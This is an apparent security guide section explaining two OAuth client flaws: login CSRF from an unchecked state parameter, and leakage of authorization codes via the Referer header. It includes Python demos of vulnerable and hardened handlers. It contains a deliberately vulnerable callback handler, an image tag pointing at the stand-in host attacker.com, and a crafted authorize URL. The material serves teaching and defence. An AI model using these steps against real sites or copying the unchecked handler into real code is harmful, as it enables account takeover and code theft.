Client Vulnerabilities
The purpose of this section is to describe common vulnerabilities found in OAuth Client implementations.
Cross-Site Request Forgery
The Client does not bind the authorization request to the user's session, i.e. it omits or fails to verify the state parameter. The attacker starts the authorization flow with their own account, intercepts the callback URL carrying the authorization code that the Authorization Server issued for the attacker's account, and tricks the Resource Owner into loading that callback URL (a hidden image, an iframe or a plain link). The Client exchanges the code and links the resulting tokens to the victim's session, so the Resource Owner ends up with the Client application connected to the Attacker's authorization context, and anything the victim later stores or acts on through that connection is visible to the attacker.
See the following challenge for a proof of concept.
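As an added example (not code from the original page or the challenge it refers to), the two versions of a Client callback handler in Python: the vulnerable one that exchanges whatever code arrives, and the hardened one that accepts the callback only when it carries the exact state value bound to the current session. The token exchange is stubbed, and every name, URL and code value below is an assumption made for the demonstration.

```python
"""Added example: why the OAuth 2.0 ``state`` parameter stops login CSRF at
the Client's callback. The token exchange is stubbed (``exchange_code``) and
all identifiers here are assumptions; no Authorization Server is contacted."""
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

AUTHORIZE_ENDPOINT = "https://oauthprovider.com/authorize"  # assumed AS
CLIENT_ID = "abc"                                            # assumed client id
REDIRECT_URI = "https://my-client.com/oauth/callback"        # assumed callback


def exchange_code(code: str) -> dict:
    """Stand-in for the back-channel token request. It derives the account
    owner from a constructed code prefix so the example can show whose
    account the callback ends up connecting."""
    owner = "attacker" if code.startswith("attacker-") else "victim"
    return {"access_token": f"token-for-{owner}", "account": owner}


def start_authorization(session: dict) -> str:
    """Build the authorization URL and bind a fresh, unguessable ``state``
    to the user's session. This is the step the vulnerable Client skips."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": "profile",
        "state": state,
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


def handle_callback_vulnerable(session: dict, callback_url: str) -> dict:
    """Vulnerable Client: whatever ``code`` arrives is exchanged and linked
    to the current session. An attacker holding a code for their *own*
    account only has to make the victim's browser load this URL."""
    query = parse_qs(urlparse(callback_url).query)
    token = exchange_code(query["code"][0])
    session["linked_account"] = token["account"]
    return {"ok": True, "linked_account": token["account"]}


def handle_callback(session: dict, callback_url: str) -> dict:
    """Hardened Client: accept the callback only if it carries exactly the
    ``state`` this session generated; the value is consumed on first use."""
    query = parse_qs(urlparse(callback_url).query)
    expected = session.pop("oauth_state", None)
    received = query.get("state", [None])[0]
    if not expected or not received or not hmac.compare_digest(
        expected.encode(), received.encode()
    ):
        return {"ok": False, "error": "state mismatch: possible CSRF"}
    token = exchange_code(query["code"][0])
    session["linked_account"] = token["account"]
    return {"ok": True, "linked_account": token["account"]}


def demo_attack() -> tuple:
    """Replay the CSRF against both callbacks; returns (vulnerable, hardened).
    The attacker ran the flow for their own account and kept the callback
    URL the AS redirected to instead of letting their browser follow it."""
    crafted = f"{REDIRECT_URI}?code=attacker-code-123"  # constructed
    victim_session = {}  # the victim never started a flow: no state bound
    vulnerable = handle_callback_vulnerable(dict(victim_session), crafted)
    hardened = handle_callback(dict(victim_session), crafted)
    return vulnerable, hardened


def demo_legitimate_flow() -> dict:
    """The honest path through the hardened handler: the state generated
    for this session comes back unchanged, so the callback is accepted."""
    session = {}
    authorize_url = start_authorization(session)
    state = parse_qs(urlparse(authorize_url).query)["state"][0]
    callback = f"{REDIRECT_URI}?code=victim-code-456&state={state}"  # constructed
    return handle_callback(session, callback)


if __name__ == "__main__":
    vulnerable, hardened = demo_attack()
    print("vulnerable client:", vulnerable)
    print("hardened client:  ", hardened)
    print("legitimate flow:  ", demo_legitimate_flow())
```

The state value has to be unguessable and tied to the session (here it is stored server-side and popped on use); a static or predictable state gives no protection, and the comparison uses a constant-time check so the value cannot be recovered byte by byte.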
Authorization Code Leakage via Referer HTTP Header
This attack scenario is a bit contrived as it requires several components in order to successfully execute.
1) The Authorization Server loosely validates the Client's redirect_uri and only checks that the host matches the registered one. For example, the Client registered https://my-client.com/oauth/callback, but the server also accepts any URI matching https://my-client.com/* in the authorization request.
2) The attacker needs to be able to create a page on the target site (the Client's own domain) that hosts attacker-supplied HTML. At a minimum they must be able to embed an image pointing to a third-party site, e.g.
<img src='http://attacker.com'>
Think of blogging software or similar software with WYSIWYG editors that allow users to embed images hosted on a third-party website.
3) The attacker sends the Victim a link that initiates the OAuth flow with the redirect_uri pointing back to the attacker-controlled sub-page, e.g.
https://oauthprovider.com/authorize?response_type=code&client_id=abc&scope=blabla&redirect_uri=https://my-client.com/usergeneratedcontent/attacker.html
4) The Victim clicks on the link, authorizes the Client, and the Authorization Server redirects the browser to the attacker's page with the authorization code in the query string:
https://my-client.com/usergeneratedcontent/attacker.html?code=AUTHORIZATION_CODE
5) The URL above may not seem dangerous, as the attacker normally has no access to the Client's server-side logs. However, when the browser loads the image embedded in the attacker-controlled page, it includes the current page URL, query string and all, in the Referer HTTP header of that image request, thus leaking the authorization code to attacker.com. Note that it is the authorization code, not an access token, that leaks: the attacker still has to redeem it, but attacker.html never exchanges it, so the single-use code is still unredeemed when it reaches the attacker.
Two caveats bound this attack in practice. First, whether the query string is sent at all depends on the referrer policy in effect. The current browser default, strict-origin-when-cross-origin, sends only the origin on cross-origin requests and nothing on an HTTPS-to-HTTP downgrade, and even the older default, no-referrer-when-downgrade, sends nothing when the https://my-client.com page loads an http://attacker.com image. The full URL leaks when the image is served over HTTPS under the older default, or when a permissive policy such as unsafe-url is set, for instance through a referrerpolicy attribute on the image or a meta tag, if the editor lets those through. Second, the root cause is precondition 1): the Authorization Server must compare the presented redirect_uri against the registered value using simple string comparison (RFC 6749 Section 3.1.2.3, reaffirmed by the OAuth 2.0 Security Best Current Practice), which rejects the attacker's sub-page before any code is issued.
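As an added example (not code from the original page), the two checks at the heart of this scenario in Python: the host-only redirect_uri match from precondition 1) beside the exact-match comparison that closes the hole, and a small model of what the browser puts in the Referer header under the referrer policies discussed above, run against the page's own URLs. The registration table, function names and the sample code value are assumptions made for the example.

```python
"""Added example: loose vs. exact redirect_uri validation at the Authorization
Server, and a model of the Referer header sent when the attacker's page loads
its image under different referrer policies. Registrations, names and the
sample code value are assumptions for this demonstration."""
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical client registrations at the Authorization Server.
REGISTERED_REDIRECT_URIS = {
    "abc": ["https://my-client.com/oauth/callback"],
}


def redirect_uri_allowed_loose(client_id: str, redirect_uri: str) -> bool:
    """The loose check from precondition 1): only the host has to match, so
    any path on my-client.com is accepted, user-generated pages included."""
    requested = urlsplit(redirect_uri)
    return any(
        urlsplit(registered).hostname == requested.hostname
        for registered in REGISTERED_REDIRECT_URIS.get(client_id, [])
    )


def redirect_uri_allowed_strict(client_id: str, redirect_uri: str) -> bool:
    """Simple string comparison of the whole URI (RFC 6749 Section 3.1.2.3):
    no prefix, wildcard or host-only matching, so attacker.html is rejected
    before the Authorization Server ever issues a code."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, [])


def referer_for_subresource(page_url: str, resource_url: str,
                            policy: str) -> Optional[str]:
    """What the browser sends as Referer when the page at ``page_url`` loads
    ``resource_url``, for the policies relevant here, following the Referrer
    Policy rules: no-referrer-when-downgrade was the old browser default,
    strict-origin-when-cross-origin is the current one."""
    page, res = urlsplit(page_url), urlsplit(resource_url)
    same_origin = (page.scheme, page.hostname, page.port) == \
                  (res.scheme, res.hostname, res.port)
    downgrade = page.scheme == "https" and res.scheme == "http"
    origin_only = f"{page.scheme}://{page.netloc}/"
    full_url = page._replace(fragment="").geturl()  # fragment is never sent
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full_url
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full_url
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return None
        return full_url if same_origin else origin_only
    raise ValueError(f"policy not modelled: {policy}")


# The page's scenario with a constructed code value.
ATTACKER_PAGE = "https://my-client.com/usergeneratedcontent/attacker.html"
LANDING_URL = f"{ATTACKER_PAGE}?code=sample-code-123"


def demo() -> dict:
    """Evaluate the scenario end to end; returns the results by name."""
    return {
        "loose_accepts_attacker_page": redirect_uri_allowed_loose("abc", ATTACKER_PAGE),
        "strict_accepts_attacker_page": redirect_uri_allowed_strict("abc", ATTACKER_PAGE),
        "referer_http_img_old_default": referer_for_subresource(
            LANDING_URL, "http://attacker.com", "no-referrer-when-downgrade"),
        "referer_https_img_old_default": referer_for_subresource(
            LANDING_URL, "https://attacker.com/pixel.gif", "no-referrer-when-downgrade"),
        "referer_https_img_current_default": referer_for_subresource(
            LANDING_URL, "https://attacker.com/pixel.gif", "strict-origin-when-cross-origin"),
        "referer_unsafe_url": referer_for_subresource(
            LANDING_URL, "http://attacker.com", "unsafe-url"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The output shows both halves of the argument: the loose validator admits attacker.html while the exact match rejects it, and the code only reaches attacker.com in the Referer when the image is fetched over HTTPS under the older default or when unsafe-url is in force; the plain http://attacker.com image from the page's example sends no Referer at all from an HTTPS page.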